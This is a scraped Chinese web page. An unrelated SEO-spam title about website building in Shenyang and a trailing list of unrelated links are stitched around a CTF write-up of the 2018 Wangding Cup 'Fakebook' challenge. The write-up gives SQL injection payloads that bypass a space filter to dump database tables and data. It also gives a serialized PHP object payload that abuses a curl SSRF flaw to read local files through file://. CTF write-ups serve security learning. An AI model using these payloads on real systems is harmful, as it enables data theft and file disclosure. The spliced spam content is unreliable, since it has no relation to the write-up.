当前位置: 首页 > news >正文

网站开发代理合同沈阳沈河区网站建设

news 2025/11/14 22:12:40
网站开发代理合同,沈阳沈河区网站建设,网站明链怎么做,什么是分类信息网站营销[网鼎杯 2018]Fakebook 打开环境出现一个登录注册的页面 在登录和注册中发现 了地址栏出现变化#xff0c;扫一波看看 看看robots.txt和flag.php 访问robots.txt看看 再访问user.php.bak ?php class UserInfo { public $name ; public …[网鼎杯 2018]Fakebook 打开环境出现一个登录注册的页面         在登录和注册中发现 了地址栏出现变化扫一波看看 看看robots.txt和flag.php    访问robots.txt看看 再访问user.php.bak ?php class UserInfo {     public $name ;     public $age 0;     public $blog ;     public function __construct($name, $age, $blog)     {         $this-name $name;         $this-age (int)$age;         $this-blog $blog;     }     function get($url)     {         $ch curl_init();         curl_setopt($ch, CURLOPT_URL, $url);         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);         $output curl_exec($ch);         $httpCode curl_getinfo($ch, CURLINFO_HTTP_CODE);         if($httpCode 404) {             return 404;         }         curl_close($ch);         return $output;     }     public function getBlogContents ()     {         return $this-get($this-blog);     }     public function isValidBlog ()     {         $blog $this-blog;         return preg_match(/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]\.)[a-zA-Z]{2,6}(\:[0-9])?(\/\S*)?$/i, $blog);     } } 想起来刚刚有一个注册的先注册一个看看 填的时候可以随便复制一篇内容过去看看这样才能进行注册 并且发现一个注入点尝试一下简单的注入 order by 4#     页面回显正常 order by 5#     页面回显不正常 说明有四个字段 union查看显位 ?no1 union select 1,2,3,4#                  no hack ~_~ ?no1 ununionion seselectlect database();    no ?no1 uNion sElEct database();               no ?no1 union/**/select 1,2,3,4#               yes ?no0 union/**/select 1,database(),3,4#      yes   测试中发现过滤了空格 回显的位置是2 库表字段内容 爆库:?no-1 union/**/select 1,database(),3,4# 报表:?no-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schemadatabase()# 爆字段:?no-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_nameusers # 爆data值:?no-1 union/**/select 1,group_concat(data),3,4 from users # 以为会出现内容但是发现没有结果得到了一串序列化的字符串 刚刚的提到的.bak文件这个应该会和刚刚的有关 发现在get方法中curl_exec()如果使用不当就会导致ssrf漏洞 有一个UserInfo的类,类中有三个公共的类变量name,age,blog。一个构造方法一个get方法。主要的工作应该是建立会话然后判断是否是有效的请求如果不是则返回404如果不是则返回url的内容一个getBlogContents方法返回一个url的内容。 可以用file协议利用ssrf漏洞读取文件再通过序列化去读取flag.php ?no-1 union/**/select 1,2,3,O:8:UserInfo:3:{s:4:name;s:5:admin;s:3:age;i:20;s:4:blog;s:83:file:///var/www/html/flag.php;}# 出现view.php
http://www.zqtcl.cn/news/345634/

相关文章:

  • 做网站标准步骤大学两学一做专题网站
  • 如何在手机上做网站Windows怎么建设网站
  • 专门做稀有产品的网站海口网站制作设计
  • 怎么查看自己的网站是否被百度收录网站的设计制作流程
  • 视觉设计网站芜湖做网站找哪家好
  • flash网站源码带asp后台电子商务有限公司网站
  • 一个网站有多少网页简单的logo设计
  • 重庆专业网站营销长春建站免费模板
  • 企业建设网站多少钱爱的网站歌曲
  • 宁波网站优化如何欣宝儿在什么网站做直播
  • 东营网签查询系统官方网站超炫的网站模板
  • 请人做网站谁来维护南宁营销型网站设计
  • 汕头做网站的公司西安建筑科技大学华清学院教务网
  • 免费行情网站在线石家庄正规制作网站公司
  • 站长工具网凡科网商城
  • 网站开发工程师需要会写什么区别沈阳网站建设建设公司哪家好
  • 营销型网站建设的优缺点利用海康威视做直播网站
  • 阿里手机网站开发框架怎么看网站被降权
  • 电视台做网站还是APP网络推广是什么意思
  • 浙江鼎兴建设有限公司网站wordpress看不到安装的主题
  • 琪觅公司网站开发c语言开发环境
  • 在哪个网站上做实验仪器比较好信息服务平台有哪些
  • 淘宝网站的建设目的是什么意思做雕塑设计的网站
  • 猎头网站模板个人社保缴费年限怎么查询
  • 博客网站设计及说明wordpress 显示 列表
  • 佛山制作手机网站莆田自助建站软件
  • 建邺做网站价格网站做换肤
  • 佛山有什么网站室内装饰设计怎么样
  • 智能建站与正常的网站购买 做网站 客户
  • 哪个是网络营销导向网站建设的基础微信商城开店需要费用吗